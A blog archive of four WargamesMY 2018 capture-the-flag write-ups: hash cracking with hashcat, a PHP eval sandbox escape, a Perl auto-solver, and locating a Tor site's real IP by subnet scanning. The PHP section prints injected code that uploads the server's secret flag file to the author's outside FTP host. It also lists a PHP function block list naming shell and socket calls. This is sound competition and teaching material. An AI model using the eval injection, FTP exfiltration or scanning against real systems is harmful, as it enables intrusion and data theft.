Category Archives: WGMY2018

WargamesMY CTF December 2018: Missing Word

ctf, WGMY2018

WargamesMY CTF 2018: Missing Word

The challenge in WargamesMY CTF 2018 require us to crack a portion of the flag which is the missing 6 characters consist of upper case and lower case denominate as XXXXXX as per below:

wgmy{h3r3_1s_y0ur_XXXXXX_br0!}

The SHA256 hashsum of the complete flag were given.

86775fe0718f57c5bcc3c32c198ece3e6a732406e3f32e3aa285059247da6652

Obviously it is a password cracking challenge therefore we will be using Hashcat for this task.

First, we need to generate a custom wordlists. We simply use this Python Wordlist Generator script found on github. (I promise i will learn more later how to generate wordlists using Hashcat itself :P)

We modified the code a bit to suit the requirement.


But it seems like it will take forever and the output wordlists size were huge. Then the idea is to split the wordlists into 2 part and generate only the last 3 character for the first part while generate only the first 3 character for the second part of the wordlists. We will use Hashcat combinator mode (-a 1) later.

Finish generated both part of the wordlists within few seconds and total file size only less than 5mb this time.

Let’s crack it!

Hashcat argument:
-a 1 : combinator mode (combine both wordlists)
-m 1400 : cracking sha256 mode
missing_word.hash : the sha256 hash file
left.txt : first part of the wordlists
right.txt : second part of the wordlists

With less than hour (22 minutes to be exact) we managed to crack it and we got first blood for the challenge.

wargamesmy missing word

Flag : wgmy{h3r3_1s_y0ur_pRiZEe_br0!}

Update: As mentioned above, here is the way how we can solve this challenge using Hashcat.

Hashcat with GPU:

 

WargamesMY CTF 2018: PHP Sandbox

ctf, WGMY2018

WargamesMY CTF 2018: PHP Sandbox.

P/S: We forgot to take screenshots for the writeup on this one, luckily there still Burp history available.

View page source we found <!– source code ./source.txt –> in html comment. View source.txt we got:

wargamesMY ctf php sandbox

Basically it is a single web page & form that take user input in parameter code and pass into eval() function.

Great! never think WGMY web challenge will be this ez pz. Lets try to do RCE..

wargamesMY ctf php sandbox

Snap! never under estimate the troll level of WGMY challenge author. All command execution function is disabled. var_dump(ini_get(‘disable_functions’)); reveal all the disabled function:

PHP
1
pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,exec,shell_exec,proc_open,popen,system,passthru,file_get_contents,readfile,fopen,ini_set,fgets,include,include_once,require,require_once,fgetcsv,parse_ini_file,rename,copy,symlink,fseek,file,file_exists,delete,chmod,fpassthru,freed,fscanf,stream_wrapper_register,stream_wrapper_restore,fsockopen,pfsockopen,curl_init,stream_context_create,show_source,highlight_file,sleep,token_get_all,yaml_parse_file

So that explain why the name of the challenge is PHP Sandbox.

Later we found scandir() is usable and reveal the target flag file .supers3cr37file.php in the same www directory.

wargamesMY ctf php sandbox

Most of the read/view file function is also disabled (maybe not all, we just cant think of any else at that time). Later we found FTP Function is usable. The idea is to transfer the flag back to us via FTP, so we run FTP server in our box.

PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$remote_file = 'flagphpsandbox.txt';
/* FTP Account */
$ftp_host = '60.52.67.38'; /* host */
$ftp_user_name = 'ayamkambing'; /* username */
$ftp_user_pass = 'wgmy2018'; /* password */
/* New file name and path for this file */
$local_file = '/var/www/html/.supers3cr37file.php';
/* Connect using basic FTP */
$connect_it = ftp_connect( $ftp_host );
/* Login to FTP */
$login_result = ftp_login( $connect_it, $ftp_user_name, $ftp_user_pass );
/* Download $remote_file and save to $local_file */
if ( ftp_put( $connect_it, $remote_file, $local_file, FTP_BINARY ) ) {
    echo "WOOT! Successfully written to $local_file\n";
}
else {
    echo "Doh! There was a problem\n";
}
/* Close the connection */
ftp_close( $connect_it );

Submit above code.

wargamesMY ctf php sandbox

Target flag file were successfully transfer to our box and finally,

$ cat flagphpsandbox.txt
<?php /*$flag = ‘wgmy{func_bl4ck1ist_1z_s0_b4d}’;*/ ?>

Flag : wgmy{func_bl4ck1ist_1z_s0_b4d}

References: PHP Scandir Function
Read All Writeup : WargamesMY CTF 2018 Writeup

WargamesMY CTF 2018: You Math Bro?

ctf, WGMY2018

WargamesMY CTF 2018: You Math Bro?

Challenge required to answer 30 questions within 40 seconds and clearly requires some form of automation.

Program also throws occasional extra text, make accommodations for it.

1
print("y u eval bro");exit();

Let’s write a script.

Solution:

you math bro
Perl
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#!/usr/bin/perl
 
use IO::Socket::INET;
use bigint;
$| = 1;
 
my ($socket,$client_socket);
 
$socket =  IO::Socket::INET->new (
  PeerAddr => "206.189.93.101",
  PeerPort => "4343",
  Type     => SOCK_STREAM,
  Proto => "tcp",
) or die "ERROR no socket created :( $!\n";
#Initial keyword expected by server to begin
my $start = "start";
print $socket $start . "\n";
 
my $html = "";
my $buffer = "";
 
while ( my $line = <$socket> ) {
  print $line;
  chomp $line;
#Replace 'x' with '*' for multiplication
  $line =~ tr/x/*/;
#Regex capture expression to evaluate
  if ( $line =~ /(\w.*\s\[.*])\s(\d.*\d)(.*)$/){
     my $result = eval($2);
     print $socket $result . "\n";
  }
}

wargamesmy ctf 2018 you math bro wargamesmy ctf 2018 you math bro

Flag : wgmy{d0_you_ev3n_m4th_br0}

Wargames.MY December 2018 – Teka Teki Pakcik Bawang

ctf, WGMY2018

We were given a .onion URL and there is a “Flag” page on the website which contain the hint for this challenge.

So basically, we need to identify the real ip of the website to get the flag. There is a hint released which shed some light:

Information Gathering: where do we run our CTF infra.

From the hint above, we then identified all wargames.my subdomain IP address:

d2018.wargames.my 68.183.226.119
gooble.wargames.my 68.183.191.52
phpsbox.wargames.my 178.128.211.120
waf2.wargames.my 167.99.72.178
hackerman.wargames.my 68.183.229.27

The next step is to identify the available host within the subnet which listening to port 80. After going through all the hassle we lastly found one.


nmap -PN -p 80 --open 167.99.64.0/20 -oG - | awk '$NF~/http/{print $2}' >> DCSG.txt

and we get the list of hosts…[output snipped]

Write simple script to grep the info like title.

#!/bin/bash

date
cat DCSG.txt | while read output
do
curl http://$output --max-time 3 | egrep 'No DB CMS' >> DCSGresult.txt
echo $output >> DCSGresult.txt
done

and return our expected result.

Access the website using IP address and here is our flag.

Flag : wgmy{bawang_membawang_tok_pawang}

Lesson learned: use http-title instead. 🙂